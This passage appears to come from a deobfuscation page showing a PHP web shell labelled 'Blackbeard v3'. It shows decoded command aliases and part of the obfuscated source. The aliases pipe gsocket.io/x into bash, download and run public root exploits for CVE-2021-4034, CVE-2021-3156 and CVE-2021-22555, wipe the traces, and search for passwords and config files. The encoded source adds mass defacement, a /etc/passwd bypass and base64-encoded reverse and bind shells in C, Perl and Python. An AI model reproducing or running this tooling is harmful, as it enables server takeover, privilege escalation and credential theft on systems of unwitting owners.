index.php","Find *config*.php in current dir"=>"dir /s /w /b *config*.php","Show active connections"=>"netstat -an","Show running services"=>"net start","User accounts"=>"net user","Show computers"=>"net view","ARP Table"=>"arp -a","IP Configuration"=>"ipconfig /all");}else{$aliases=array("Run GS"=>"bash -c \"$(wget --no-check-certificate -qO- gsocket.io/x)"","Check Modules"=>"gcc -v; python --version; make --version","4034.c"=>"cd /tmp && eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh"","4034.py"=>"cd /tmp && wget -O as.py https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py && python as.py","3156.py"=>"cd /tmp && wget -O asw.py https://raw.githubusercontent.com/worawit/CVE-2021-3156/main/exploit_userspec.py && python asw.py","exploit.c"=>"cd /tmp && wget -O exploit.c https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c && gcc -m32 -static -o exploit exploit.c && chmod +x exploit && ./exploit","Clear Jejak Rooting"=>"cd /tmp && rm -rf as.py asw.py exploit.c exploit Makefile cve-2021-4034.c cve-2021-4034.sh pwnkit.c cve-2021-4034 GCONV_PATH=. pwnkit.so pwnkit gconv-modules payload.so","List dir"=>"ls -lha","list file attributes on a Linux second extended file system"=>"lsattr -va","show opened ports"=>"netstat -an | grep -i listen","process status"=>"ps aux","Find"=>'',"find all suid files"=>"find / -type f -perm -04000 -ls","find suid files in current dir"=>"find . -type f -perm -04000 -ls","find all sgid files"=>"find / -type f -perm -02000 -ls","find sgid files in current dir"=>"find . -type f -perm -02000 -ls","find config.inc.php files"=>"find / -type f -name config.inc.php","find config* files"=>"find / -type f -name "config*"","find config* files in current dir"=>"find . -type f -name "config*"","find all writable folders and files"=>"find / -perm -2 -ls","find all writable folders and files in current dir"=>"find . -perm -2 -ls","find all service.pwd files"=>"find / -type f -name service.pwd","find service.pwd files in current dir"=>"find . -type f -name service.pwd","find all .htpasswd files"=>"find / -type f -name .htpasswd","find .htpasswd files in current dir"=>"find . -type f -name .htpasswd","find all .bash_history files"=>"find / -type f -name .bash_history","find .bash_history files in current dir"=>"find . -type f -name .bash_history","find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc","find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc","Locate"=>'',"locate httpd.conf files"=>"locate httpd.conf","locate vhosts.conf files"=>"locate vhosts.conf","locate proftpd.conf files"=>"locate proftpd.conf","locate psybnc.conf files"=>"locate psybnc.conf","locate my.conf files"=>"locate my.conf","locate admin.php files"=>"locate admin.php","locate cfg.php files"=>"locate cfg.php","locate conf.php files"=>"locate conf.php","locate config.dat files"=>"locate config.dat","locate config.php files"=>"locate config.php","locate config.inc files"=>"locate config.inc","locate config.inc.php"=>"locate config.inc.php","locate config.default.php files"=>"locate config.default.php","locate config* files "=>"locate config","locate .conf files"=>"locate '.conf'","locate .pwd files"=>"locate '.pwd'","locate .sql files"=>"locate '.sql'","locate .htpasswd files"=>"locate '.htpasswd'","locate .bash_history files"=>"locate '.bash_history'","locate .mysql_history files"=>"locate '.mysql_history'","locate .fetchmailrc files"=>"locate '.fetchmailrc'","locate backup files"=>"locate backup","locate dump files"=>"locate dump");}goto aeTs4;izs2B:ini_set("html_errors",0);goto fcb9Z;ZktEK:@define("VERSION","Blackbeard v3");goto sgdrg;mL35z:error_reporting(0);goto dMy2L;fcb9Z:ini_set("log_errors",0);goto c9t3R;Cxc8F:if(!isset($_COOKIE[sha1(md5($_SERVER["HTTP_HOST"]))."x"])){prototype(sha1(md5($_SERVER["HTTP_HOST"]))."x",$asciifnc4);}goto TJJYv;W2Gtj:session_start();goto ztzEK;TODUM:  ?>

Did this file decode correctly?

Original Code


1
<?php goto W2Gtj;gXAzU:function actionDeface(){hardHeader();echo "\x3c\143\x65\156\164\145\x72\76\74\x68\x31\x3e\115\x61\163\x73\x20\x44\x65\x66\x61\x63\145\x3c\x2f\150\61\x3e\74\x64\151\x76\x20\x63\x6c\x61\x73\163\75\143\x6f\x6e\164\x65\156\x74\76\74\142\x72\76";echo "\74\142\x72\x3e\74\x63\x65\156\164\x65\x72\x3e\40\74\151\x66\x72\141\155\145\x20\x66\x72\x61\155\145\102\157\162\x64\145\x72\x3d\x30\40\x73\x72\143\x3d\x27\x3f\155\141\163\47\x20\x77\151\x64\x74\x68\x3d\x27\x38\x30\60\x27\x20\150\145\151\x67\150\164\x3d\x27\64\x35\x30\47\x3e\x3c\x2f\x69\146\162\141\x6d\145\x3e\x3c\57\x61\76\x3c\x2f\144\x69\166\76";hardFooter();}goto sVdqn;Heuhn:if(!$safe_mode){error_reporting(0);}goto ZiHyv;WwD7E:function actionpassw(){hardHeader();echo "\74\x63\145\x6e\164\x65\x72\x3e\74\150\x31\x3e\x42\171\x70\141\x73\x73\72\40\x2f\x65\x74\x63\57\160\x61\x73\x73\x77\x64\74\x2f\150\x31\x3e\74\144\151\166\40\x63\x6c\x61\163\163\x3d\x63\x6f\156\x74\x65\x6e\164\x3e\x3c\142\x72\x3e";echo "\74\x62\x72\x3e\x3c\143\x65\x6e\164\145\x72\x3e\x20\x20\74\x69\x66\x72\x61\155\145\x20\146\162\x61\155\145\x42\x6f\162\144\145\x72\x3d\60\40\163\x72\x63\75\x27\77\160\x61\x73\163\x77\x64\47\40\x77\151\144\x74\150\75\47\71\x30\x30\47\40\150\x65\151\147\x68\164\x3d\x27\x34\60\x30\x27\x3e\74\x2f\151\x66\162\x61\x6d\145\76\74\57\141\76";echo "\x3c\x2f\144\151\166\76";hardFooter();}goto gA0nc;wgCev:if(!isset($_POST["\156\145"])){if(isset($_POST["\141"])){$_POST["\141"]=iconv("\165\x74\146\x2d\x38",$_POST["\x63\150\x61\162\163\145\x74"],decrypt($_POST["\x61"],$_COOKIE[sha1(md5($_SERVER["\x48\124\x54\120\137\x48\x4f\x53\x54"]))."\x78"]));}if(isset($_POST["\x63"])){$_POST["\143"]=iconv("\x75\164\x66\x2d\x38",$_POST["\143\150\141\162\x73\145\x74"],decrypt($_POST["\143"],$_COOKIE[sha1(md5($_SERVER["\110\x54\124\x50\x5f\110\117\123\x54"]))."\170"]));}if(isset($_POST["\160\x31"])){$_POST["\160\61"]=iconv("\x75\164\146\55\70",$_POST["\143\x68\141\x72\163\x65\164"],decrypt($_POST["\x70\x31"],$_COOKIE[sha1(md5($_SERVER["\x48\124\124\x50\x5f\110\x4f\x53\124"]))."\170"]));}if(isset($_POST["\x70\62"])){$_POST["\160\x32"]=iconv("\x75\x74\x66\x2d\70",$_POST["\x63\150\x61\x72\163\145\164"],decrypt($_POST["\160\62"],$_COOKIE[sha1(md5($_SERVER["\x48\x54\124\x50\x5f\x48\x4f\123\124"]))."\x78"]));}if(isset($_POST["\160\x33"])){$_POST["\x70\63"]=iconv("\165\164\x66\x2d\x38",$_POST["\143\150\141\x72\163\x65\164"],decrypt($_POST["\160\63"],$_COOKIE[sha1(md5($_SERVER["\x48\124\x54\120\137\110\117\123\x54"]))."\x78"]));}}goto wVm3J;PxqVi:function actionreversephp(){hardHeader();echo "\74\143\x65\x6e\164\x65\x72\x3e\x3c\150\61\x3e\x52\x65\166\145\162\163\x65\x20\124\103\x50\40\x50\110\120\x3c\x2f\150\61\x3e\74\144\151\166\40\143\x6c\141\x73\x73\75\143\157\x6e\x74\145\156\x74\76\74\142\x72\76";echo "\74\142\x72\76\74\x63\x65\156\x74\145\x72\x3e\x20\40\74\x69\146\x72\x61\155\x65\x20\146\162\141\x6d\x65\102\x6f\162\x64\145\x72\75\60\x20\163\x72\x63\75\47\77\x72\x65\x76\145\162\163\x65\x70\x68\x70\x27\40\167\151\144\x74\150\x3d\47\71\x30\60\47\40\x68\145\x69\147\x68\x74\75\x27\63\x30\x30\x27\x3e\x3c\x2f\x69\x66\162\141\x6d\145\x3e\74\57\141\x3e";echo "\x3c\57\x64\x69\166\76";hardFooter();}goto Y4Cln;IHn50:ob_start();goto mL35z;ayxVY:function actionNetwork(){hardHeader();$back_connect_c="\x49\62\154\165\x59\62\x78\x31\132\107\x55\147\x50\110\x4e\x30\x5a\107\x6c\x76\114\155\x67\x2b\x44\121\x6f\x6a\141\x57\x35\152\142\110\126\153\x5a\123\101\x38\x63\63\154\172\114\63\x4e\x76\131\x32\164\154\144\x43\x35\x6f\x50\x67\x30\113\x49\x32\x6c\x75\131\62\x78\x31\132\x47\125\147\x50\107\x35\154\144\107\x6c\165\x5a\130\121\166\141\x57\x34\x75\x61\x44\64\116\x43\155\154\165\x64\x43\102\164\131\127\154\165\113\x47\x6c\165\x64\103\102\x68\143\x6d\144\x6a\114\103\102\x6a\x61\107\106\171\x49\103\160\x68\x63\x6d\x64\x32\127\61\60\x70\111\x48\163\x4e\x43\151\x41\147\x49\x43\102\x70\142\156\x51\x67\x5a\155\x51\67\104\x51\157\x67\111\103\101\147\x63\x33\122\171\x64\x57\116\x30\x49\x48\116\x76\x59\x32\164\150\132\x47\122\x79\130\62\154\x75\x49\110\116\x70\142\x6a\163\x4e\x43\151\101\x67\111\x43\x42\153\x59\x57\x56\164\x62\x32\64\x6f\x4d\x53\167\x77\x4b\x54\x73\x4e\x43\151\101\x67\111\103\x42\x7a\x61\127\64\x75\143\62\x6c\165\x58\62\x5a\150\x62\x57\154\x73\x65\123\x41\71\111\x45\x46\x47\x58\60\x6c\117\122\x56\x51\x37\104\121\x6f\x67\111\x43\x41\147\143\62\154\165\114\156\x4e\160\x62\154\x39\x77\x62\x33\x4a\x30\x49\x44\x30\x67\x61\x48\x52\x76\142\156\x4d\x6f\131\130\x52\166\x61\123\150\150\143\155\144\62\127\x7a\x4a\x64\113\x53\153\x37\104\x51\157\x67\x49\x43\101\147\143\x32\154\165\x4c\156\x4e\160\x62\x6c\x39\x68\132\107\x52\171\x4c\156\116\146\x59\x57\122\153\143\151\x41\71\x49\107\x6c\x75\132\130\x52\146\x59\x57\122\x6b\x63\151\x68\150\143\x6d\144\62\x57\172\x46\144\113\x54\163\x4e\x43\151\101\147\111\103\102\x6d\x5a\103\x41\x39\x49\110\x4e\166\x59\62\164\154\144\103\150\102\122\154\71\112\124\x6b\126\125\x4c\103\x42\x54\x54\60\x4e\114\x58\61\116\125\125\153\126\x42\x54\123\x77\147\123\126\x42\x51\x55\153\71\125\x54\x31\x39\x55\x51\x31\101\x70\111\104\163\116\103\151\x41\x67\x49\103\x42\160\132\x69\101\x6f\113\107\x4e\166\142\155\x35\x6c\131\63\x51\157\132\155\121\x73\x49\103\150\172\x64\110\112\61\131\63\x51\x67\143\x32\x39\152\141\x32\106\153\132\x48\x49\x67\113\151\153\147\x4a\156\116\x70\x62\x69\x77\x67\143\62\154\x36\x5a\127\71\x6d\x4b\x48\116\x30\x63\x6e\x56\152\x64\x43\102\x7a\x62\62\x4e\162\131\127\x52\153\x63\151\153\160\113\124\x77\x77\x4b\x53\x42\67\104\x51\x6f\147\111\x43\x41\x67\111\x43\101\x67\x49\x48\102\154\143\x6e\112\x76\x63\151\147\151\121\x32\71\x75\142\155\126\152\x64\103\102\x6d\x59\x57\154\163\x49\151\153\67\104\121\157\147\x49\103\101\x67\x49\x43\x41\x67\111\x48\x4a\x6c\144\110\126\171\x62\151\101\167\117\x77\60\x4b\x49\103\x41\x67\x49\x48\60\116\103\x69\x41\x67\111\103\x42\x6b\144\130\x41\x79\113\x47\x5a\x6b\x4c\x43\101\x77\113\124\x73\x4e\103\151\x41\147\111\103\x42\x6b\144\x58\101\x79\x4b\107\x5a\x6b\x4c\x43\x41\x78\113\x54\x73\116\103\151\x41\147\111\103\x42\153\x64\x58\x41\x79\x4b\107\132\153\114\x43\101\171\x4b\124\x73\116\x43\151\x41\x67\111\x43\102\x7a\145\x58\116\x30\132\x57\x30\x6f\111\x69\71\151\141\x57\64\166\143\x32\x67\x67\x4c\x57\x6b\151\x4b\x54\x73\x4e\103\x69\x41\x67\111\103\102\152\x62\x47\71\x7a\x5a\x53\x68\155\x5a\x43\153\x37\104\x51\x70\71";$back_connect_p="\x49\x79\105\166\x64\130\x4e\x79\114\x32\112\160\x62\151\x39\167\x5a\x58\112\163\x44\x51\x70\61\x63\62\125\147\x55\62\x39\x6a\x61\62\x56\x30\x4f\x77\60\x4b\x4a\x47\154\x68\x5a\107\122\171\x50\x57\x6c\165\132\130\122\x66\131\x58\x52\x76\x62\151\x67\153\x51\x56\112\x48\126\x6c\x73\x77\x58\123\153\147\x66\x48\x77\147\132\107\154\154\x4b\x43\112\x46\x63\156\x4a\x76\143\x6a\x6f\147\x4a\103\x46\x63\x62\x69\x49\160\x4f\167\60\x4b\112\110\x42\150\132\x47\122\x79\120\x58\x4e\x76\x59\62\x74\150\132\x47\122\171\x58\62\154\165\x4b\x43\122\102\125\x6b\x64\127\x57\172\106\144\x4c\x43\101\x6b\x61\x57\106\153\x5a\x48\x49\160\x49\110\170\70\111\x47\x52\160\132\123\147\151\x52\130\112\x79\x62\x33\x49\x36\111\x43\x51\150\130\107\x34\151\x4b\124\x73\116\103\151\122\x77\143\x6d\x39\x30\142\172\61\x6e\132\x58\122\x77\143\155\x39\x30\x62\62\112\x35\x62\155\106\164\x5a\123\147\x6e\x64\107\116\x77\x4a\x79\153\x37\x44\121\160\x7a\142\62\116\162\132\130\x51\x6f\125\60\x39\104\123\x30\x56\125\x4c\x43\102\121\122\154\x39\112\124\153\126\x55\114\103\102\124\x54\x30\116\x4c\x58\61\x4e\125\x55\153\x56\x42\124\x53\167\147\112\x48\102\171\142\x33\x52\166\x4b\x53\102\70\x66\103\102\153\x61\127\125\x6f\x49\x6b\x56\x79\143\155\71\x79\x4f\151\x41\x6b\x49\126\x78\165\x49\151\x6b\x37\x44\121\160\152\x62\62\x35\165\x5a\127\x4e\x30\113\x46\x4e\120\121\x30\164\x46\x56\103\167\x67\x4a\x48\x42\x68\x5a\x47\122\x79\113\x53\102\x38\x66\x43\102\x6b\x61\127\x55\157\x49\153\x56\171\x63\155\71\171\117\151\101\x6b\x49\x56\x78\165\111\151\153\x37\x44\121\x70\x76\143\107\126\x75\113\x46\116\x55\122\105\x6c\117\x4c\x43\x41\151\x50\x69\132\x54\x54\60\x4e\114\x52\x56\x51\151\113\x54\x73\x4e\103\x6d\71\167\132\127\64\157\x55\x31\x52\x45\x54\x31\126\x55\x4c\103\101\x69\x50\x69\132\x54\124\60\x4e\x4c\122\126\121\x69\113\x54\163\x4e\103\155\71\167\132\x57\x34\157\125\x31\x52\105\x52\x56\112\123\114\103\101\x69\x50\x69\132\124\x54\60\116\x4c\122\x56\121\x69\113\124\163\x4e\x43\x6e\x4e\65\143\x33\x52\x6c\x62\x53\x67\x6e\114\x32\112\160\x62\x69\x39\172\x61\103\101\164\x61\x53\143\x70\x4f\x77\x30\113\131\62\x78\166\143\x32\x55\157\125\61\x52\x45\x53\x55\64\160\117\x77\60\113\131\x32\170\x76\x63\x32\x55\157\125\61\x52\x45\x54\x31\126\125\x4b\124\163\116\103\155\116\163\142\63\x4e\154\113\x46\116\x55\x52\105\126\123\x55\151\x6b\x37";$bind_port_c="\111\x32\x6c\165\131\x32\170\x31\x5a\x47\125\x67\120\x48\x4e\x30\132\107\154\x76\114\x6d\x67\x2b\104\x51\x6f\x6a\x61\127\65\x6a\142\x48\x56\153\132\123\101\70\143\63\122\171\141\127\x35\156\114\x6d\147\x2b\104\x51\x6f\152\141\x57\65\152\x62\110\126\x6b\132\123\x41\x38\x64\127\x35\160\143\63\122\153\x4c\x6d\x67\x2b\104\x51\x6f\152\141\x57\x35\152\x62\110\126\x6b\132\123\x41\70\x62\x6d\126\x30\132\107\111\x75\x61\x44\64\x4e\103\151\x4e\160\142\x6d\x4e\163\144\x57\x52\154\111\x44\x78\x7a\144\x47\x52\x73\141\127\x49\x75\141\x44\x34\116\103\x6d\154\165\144\103\x42\x74\x59\x57\154\165\x4b\107\154\165\144\x43\x42\150\x63\155\144\x6a\x4c\103\x42\152\x61\107\106\171\111\x43\157\x71\x59\x58\x4a\156\144\x69\x6b\147\x65\167\60\113\111\103\x41\147\x49\x47\x6c\165\144\103\x42\x7a\x4c\x47\115\x73\x61\x54\x73\x4e\x43\151\101\147\x49\103\x42\x6a\x61\107\106\x79\111\x48\x42\142\115\x7a\x42\144\x4f\x77\60\113\111\103\x41\147\x49\110\x4e\60\x63\x6e\x56\x6a\x64\103\x42\x7a\142\x32\x4e\162\x59\127\x52\x6b\x63\x6c\71\x70\x62\151\102\171\117\x77\x30\113\111\103\x41\147\111\x47\122\x68\x5a\x57\61\x76\x62\x69\147\170\114\104\x41\x70\117\x77\x30\x4b\111\103\101\147\x49\110\115\147\120\123\x42\172\142\x32\x4e\x72\132\x58\x51\x6f\x51\125\x5a\146\x53\x55\65\x46\126\x43\x78\x54\124\60\116\114\130\61\116\125\x55\x6b\x56\102\x54\123\167\x77\x4b\124\163\x4e\103\x69\x41\147\x49\x43\102\x70\132\151\147\x68\x63\171\153\147\x63\x6d\x56\x30\x64\130\112\x75\x49\103\x30\x78\117\x77\60\113\x49\103\101\147\x49\110\x49\165\x63\62\x6c\165\x58\x32\x5a\x68\142\x57\x6c\163\x65\123\101\71\x49\105\x46\107\x58\60\154\117\x52\x56\121\67\104\121\157\x67\x49\x43\101\147\x63\151\x35\x7a\141\127\x35\x66\x63\107\71\x79\x64\103\x41\x39\111\107\x68\x30\x62\x32\65\172\113\x47\106\x30\x62\62\x6b\157\131\130\112\156\x64\x6c\163\170\x58\123\x6b\160\x4f\x77\60\x4b\111\103\101\147\x49\x48\x49\165\x63\x32\x6c\165\x58\62\x46\x6b\x5a\x48\111\x75\143\61\71\150\132\107\122\x79\111\x44\60\147\141\110\122\x76\142\x6d\167\x6f\123\x55\x35\102\122\x45\122\123\130\x30\106\117\x57\123\x6b\67\104\121\157\x67\x49\103\101\147\131\155\x6c\165\132\x43\x68\172\x4c\x43\x41\x6f\x63\x33\122\x79\144\127\x4e\x30\111\110\116\x76\x59\62\164\x68\x5a\x47\x52\x79\111\103\157\160\x4a\x6e\111\163\x49\104\102\64\115\x54\101\x70\117\x77\x30\113\111\x43\101\x67\111\x47\170\160\143\x33\122\x6c\142\151\x68\x7a\x4c\x43\x41\x31\113\x54\163\116\x43\x69\101\147\x49\103\x42\x33\x61\x47\154\163\132\123\x67\170\x4b\x53\x42\67\x44\121\157\x67\111\103\x41\147\x49\x43\101\x67\111\107\x4d\71\131\127\x4e\x6a\x5a\130\102\60\113\x48\x4d\x73\x4d\x43\167\167\113\124\x73\x4e\103\151\101\x67\111\x43\101\x67\111\x43\101\147\x5a\110\126\167\115\x69\150\152\x4c\104\101\x70\117\167\60\113\111\103\101\x67\111\103\101\x67\x49\x43\x42\153\144\130\101\171\x4b\107\115\163\x4d\123\153\67\104\x51\x6f\147\x49\103\101\147\111\103\101\x67\111\x47\x52\x31\143\x44\x49\157\131\171\167\x79\113\x54\163\116\103\x69\101\x67\111\103\x41\x67\x49\103\x41\x67\144\63\112\x70\144\x47\125\157\131\171\x77\x69\125\107\106\x7a\143\63\x64\166\143\x6d\121\66\x49\151\x77\x35\x4b\x54\163\x4e\103\151\101\147\x49\103\x41\x67\x49\103\101\147\143\x6d\126\x68\132\x43\x68\x6a\114\110\101\163\143\62\154\66\132\127\71\155\x4b\x48\101\x70\x4b\124\163\x4e\x43\151\x41\x67\x49\103\x41\147\x49\x43\101\147\132\155\x39\171\113\107\x6b\x39\115\x44\164\160\x50\x48\116\60\143\155\x78\154\x62\151\x68\x77\x4b\x54\x74\x70\x4b\171\x73\x70\104\121\x6f\147\111\103\x41\x67\x49\x43\x41\x67\111\x43\x41\147\111\x43\x42\x70\x5a\x69\147\x67\x4b\110\x42\x62\x61\126\60\x67\120\x54\x30\x67\112\61\170\165\x4a\x79\153\x67\x66\x48\x77\147\113\x48\x42\142\x61\x56\x30\x67\x50\x54\x30\147\112\61\x78\171\x4a\171\x6b\x67\113\x51\60\113\x49\103\101\147\x49\103\101\x67\x49\x43\x41\147\111\x43\101\147\x49\x43\101\147\x49\110\102\142\x61\x56\x30\147\x50\123\x41\156\x58\104\101\x6e\x4f\167\x30\113\111\103\x41\x67\x49\x43\101\x67\x49\x43\102\160\x5a\x69\x41\x6f\143\x33\x52\171\x59\x32\x31\167\113\107\x46\171\132\63\132\x62\115\154\x30\163\x63\x43\x6b\x67\x50\x54\60\147\115\103\x6b\x4e\103\151\101\147\111\x43\101\147\x49\103\x41\147\x49\x43\101\x67\x49\110\x4e\65\143\63\x52\154\x62\x53\147\x69\114\62\x4a\x70\142\151\x39\172\x61\x43\x41\x74\141\123\111\x70\x4f\167\60\113\x49\103\101\x67\x49\x43\x41\x67\x49\103\102\152\x62\x47\71\x7a\132\x53\150\152\113\x54\x73\116\x43\151\101\147\111\103\x42\71\x44\121\160\x39";$pyy="\111\x79\105\166\x64\130\116\x79\114\x32\112\160\142\x69\71\x77\145\x58\x52\157\142\62\x34\116\x43\x69\x4e\x56\x63\62\x46\x6e\x5a\124\x6f\147\143\110\x6c\60\x61\107\x39\x75\x49\107\x5a\x70\x62\x47\x56\165\x59\127\x31\154\114\x6e\x42\x35\111\x45\150\x50\x55\61\121\147\125\105\71\x53\126\101\x30\113\x61\x57\x31\x77\142\x33\112\x30\x49\110\116\x35\143\171\x77\x67\143\62\x39\x6a\141\62\126\x30\x4c\103\x42\x76\143\x79\x77\147\x63\63\x56\151\143\110\112\166\x59\x32\126\172\143\167\x30\113\141\x58\102\x73\x62\x79\101\71\x49\x48\x4e\65\x63\x79\x35\150\143\x6d\144\62\x57\172\106\x64\104\121\x70\x77\142\63\x4a\60\142\107\x38\147\120\x53\x42\x70\142\156\x51\157\x63\x33\154\172\x4c\155\x46\x79\132\63\132\142\x4d\x6c\x30\x70\x44\121\x70\x7a\x62\62\x4e\x72\x5a\x58\121\165\x63\62\126\60\x5a\x47\x56\x6d\131\130\126\163\144\110\x52\x70\x62\127\x56\166\144\x58\121\157\116\152\x41\x70\x44\x51\x70\x6b\x5a\x57\131\x67\x63\x48\x6c\151\131\127\x4e\162\131\62\x39\165\142\155\x56\152\x64\x43\x67\x70\117\x67\60\x4b\x49\x43\102\x30\x63\156\x6b\x36\104\121\157\147\x49\x43\x41\x67\x61\155\61\151\111\x44\x30\147\143\62\x39\152\141\x32\126\x30\114\x6e\116\x76\131\x32\164\x6c\x64\103\x68\x7a\142\62\116\162\x5a\x58\x51\165\x51\125\132\x66\x53\125\x35\106\x56\x43\x78\172\x62\x32\x4e\x72\x5a\x58\121\165\125\60\71\x44\x53\x31\71\x54\x56\x46\x4a\106\x51\125\60\160\x44\121\157\x67\x49\103\x41\147\x61\155\61\151\x4c\155\116\166\x62\155\65\154\x59\63\121\x6f\113\107\x6c\x77\142\107\x38\x73\x63\107\71\x79\144\107\170\166\113\123\153\116\103\151\101\147\x49\x43\102\161\142\x57\111\x75\143\62\x56\165\x5a\103\147\x6e\112\171\x64\x63\x62\154\102\x35\x64\107\150\x76\x62\x69\102\103\131\x57\116\162\x51\x32\71\x75\142\x6d\126\x6a\x64\x43\102\103\145\123\102\x44\x62\62\x34\63\132\x58\150\x30\111\103\x30\x67\x57\107\x46\x70\x49\106\116\65\142\x6d\122\160\x59\x32\106\x30\x5a\126\170\x75\126\x47\x68\x68\x62\x6d\x74\172\111\105\144\x76\x62\62\144\x73\x5a\123\102\x47\x62\x33\111\x67\125\x6d\x56\155\x5a\x58\x4a\154\x62\x6e\x4e\x70\130\x47\x35\143\142\x69\143\x6e\112\x79\153\x4e\x43\151\101\x67\111\103\x42\166\143\x79\x35\x6b\x64\x58\x41\x79\x4b\x47\160\x74\131\151\65\155\x61\127\170\x6c\142\x6d\70\157\x4b\123\167\167\x4b\x51\60\x4b\x49\x43\x41\147\111\x47\71\172\114\155\x52\x31\x63\104\111\x6f\x61\x6d\61\x69\x4c\155\x5a\x70\x62\107\x56\165\x62\x79\147\160\114\x44\x45\x70\x44\x51\x6f\147\x49\103\x41\x67\142\x33\x4d\x75\x5a\x48\126\167\115\151\x68\x71\142\x57\111\165\x5a\x6d\154\x73\132\x57\x35\166\x4b\103\x6b\163\115\151\153\x4e\103\x69\101\147\x49\x43\x42\166\143\x79\65\x6b\144\x58\x41\171\x4b\107\x70\x74\x59\151\x35\155\x61\127\170\154\x62\155\70\x6f\113\x53\167\172\113\x51\x30\113\x49\103\x41\147\111\x48\116\x6f\132\x57\170\x73\111\x44\x30\x67\143\x33\126\151\143\x48\x4a\x76\131\62\x56\x7a\143\171\x35\152\x59\x57\x78\x73\113\x46\163\151\x4c\62\x4a\x70\142\x69\71\x7a\x61\103\x49\163\x49\151\61\x70\x49\x6c\60\x70\x44\x51\157\x67\x49\107\126\x34\x59\62\x56\x77\144\103\x42\x7a\x62\x32\x4e\x72\x5a\x58\121\x75\144\x47\154\x74\x5a\127\x39\x31\144\104\157\x4e\103\151\101\147\x49\103\x42\167\x63\155\154\x75\x64\103\101\x69\x56\x47\154\x74\124\63\x56\60\x49\147\60\113\111\x43\x42\x6c\x65\x47\x4e\x6c\143\x48\121\x67\x63\62\x39\152\141\62\126\60\114\155\x56\x79\143\x6d\71\x79\114\x43\102\x6c\117\x67\60\113\x49\103\x41\147\x49\x48\x42\x79\x61\x57\65\60\x49\x43\x4a\106\x63\x6e\x4a\166\143\151\111\163\x49\x47\125\x4e\x43\156\x42\65\x59\x6d\106\x6a\141\62\x4e\x76\142\155\x35\x6c\x59\x33\121\157\x4b\x51\75\75";$bind_port_p="\x49\x79\x45\x76\144\x58\x4e\x79\114\x32\112\x70\142\151\71\167\132\130\112\163\x44\121\x6f\x6b\x55\x30\150\x46\124\105\167\71\111\x69\71\151\141\127\x34\x76\x63\x32\x67\x67\114\x57\x6b\151\117\167\x30\x4b\141\127\131\147\113\x45\x42\102\x55\x6b\144\x57\x49\104\167\147\115\x53\153\147\x65\171\x42\154\145\x47\154\60\x4b\x44\x45\160\117\171\x42\71\104\x51\x70\61\143\62\125\147\125\62\71\152\x61\62\x56\x30\x4f\x77\60\x4b\143\62\x39\152\x61\62\x56\60\x4b\106\x4d\x73\112\154\102\x47\130\60\154\x4f\122\126\121\x73\112\154\x4e\120\x51\60\x74\x66\x55\61\x52\123\x52\x55\106\x4e\114\107\x64\154\x64\x48\102\x79\x62\63\122\x76\131\156\x6c\x75\x59\x57\x31\x6c\x4b\103\x64\x30\131\x33\x41\156\113\x53\x6b\147\146\110\x77\147\132\107\x6c\x6c\x49\103\x4a\104\131\x57\65\x30\x49\107\116\x79\x5a\x57\106\60\x5a\123\102\x7a\142\x32\x4e\162\132\x58\x52\143\x62\x69\111\67\104\x51\160\172\x5a\130\x52\172\142\x32\116\x72\142\x33\102\60\x4b\106\115\163\125\60\x39\115\x58\x31\x4e\x50\x51\x30\164\x46\x56\x43\170\124\124\x31\71\x53\122\x56\x56\124\x52\125\x46\105\122\x46\111\x73\x4d\x53\153\67\x44\121\160\151\x61\x57\65\153\x4b\x46\115\x73\143\62\x39\152\x61\62\106\153\x5a\110\112\146\x61\127\x34\157\112\105\x46\123\x52\61\x5a\142\x4d\106\x30\163\123\x55\x35\102\x52\105\x52\x53\130\60\106\117\x57\x53\153\x70\111\x48\170\x38\x49\107\122\x70\x5a\123\101\151\121\x32\106\165\144\x43\102\x76\x63\x47\126\165\x49\x48\x42\x76\x63\156\x52\143\142\x69\111\x37\104\x51\x70\163\141\130\116\60\132\x57\x34\x6f\x55\171\167\172\113\123\102\70\x66\103\102\153\x61\127\x55\147\x49\153\116\x68\142\156\121\147\142\x47\154\172\x64\x47\126\165\x49\x48\x42\166\x63\x6e\122\x63\x62\x69\111\x37\104\121\160\63\x61\x47\x6c\x73\132\x53\x67\x78\x4b\123\102\67\x44\121\157\112\x59\127\116\x6a\x5a\130\x42\x30\x4b\105\116\x50\x54\x6b\64\x73\125\x79\153\67\x44\121\x6f\x4a\x61\x57\x59\x6f\x49\123\x67\153\143\107\x6c\153\120\127\x5a\166\x63\155\x73\160\113\123\x42\67\x44\x51\x6f\112\x43\x57\122\x70\x5a\123\101\151\x51\62\x46\x75\142\x6d\x39\60\x49\x47\x5a\x76\x63\x6d\163\151\x49\107\154\x6d\x49\x43\147\150\x5a\107\x56\x6d\x61\127\x35\x6c\132\x43\x41\153\143\x47\154\153\x4b\x54\x73\116\x43\x67\153\x4a\x62\63\x42\154\142\151\x42\x54\x56\x45\122\x4a\x54\x69\167\x69\120\x43\132\104\x54\x30\65\117\x49\x6a\163\x4e\103\x67\153\112\142\63\102\x6c\x62\x69\x42\124\x56\105\x52\x50\x56\x56\121\163\x49\152\x34\155\121\x30\x39\117\124\151\111\67\x44\121\x6f\x4a\103\127\71\x77\x5a\x57\64\x67\125\x31\x52\105\122\126\x4a\x53\114\x43\x49\53\112\x6b\116\120\x54\153\x34\x69\x4f\167\x30\113\x43\x51\154\x6c\x65\107\126\x6a\x49\103\x52\x54\x53\105\126\x4d\x54\x43\102\x38\x66\x43\x42\x6b\x61\x57\125\x67\143\110\112\x70\142\x6e\121\x67\121\60\x39\117\x54\151\x41\x69\x51\62\106\165\144\103\x42\154\x65\x47\x56\x6a\x64\x58\x52\x6c\x49\103\122\124\123\x45\126\115\x54\x46\170\165\111\152\x73\x4e\x43\147\153\x4a\131\62\170\166\143\62\x55\147\x51\60\71\117\124\x6a\163\x4e\x43\x67\x6b\112\132\x58\150\160\x64\103\101\x77\x4f\167\x30\x4b\x43\130\x30\116\103\156\60\x3d";echo 